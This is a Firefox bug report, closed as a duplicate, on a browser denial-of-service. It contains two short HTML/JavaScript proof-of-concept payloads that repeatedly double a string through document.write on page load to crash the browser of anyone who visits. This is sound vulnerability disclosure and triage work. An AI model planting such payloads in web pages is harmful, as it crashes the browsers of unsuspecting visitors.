Closed Bug 576854 Opened 14 years ago Closed 14 years ago

Denial of service

Categories

(Firefox :: Security, defect)

x86
Windows XP
defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 537620

People

(Reporter: kaboekloe, Unassigned)

Details

User-Agent:       Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Media Center PC 4.0; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Build Identifier: vg

This code makes a denial of service and crashes the browser:


<body onload="javascript:inifiles();"></body>
 
<script>
 
function inifiles() {
var b = '\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
for (a =0;a<77777777777777;a++) {
b+=b+'\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
document.write('<html><marquee><h1>'+b+b);

}
 
}
 
</script>

Reproducible: Always

Actual Results:  
If somebody places that HTML code on his website, and a victim goes to that website with this HTML code, the browser will crash.

Expected Results:  
crash

denial of service
Looks essentially the same as bug 537620.

Attachment 419887 from bug 537620 is essentially the same as this.

<body onload="javascript:DoS();"></body>

<script>

function DoS() {

var buffer = 'A';
for (i =0;i<150;i++) {
buffer+=buffer+'A';
document.write('<html><marquee>'+buffer+buffer);
}

}

</script>
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE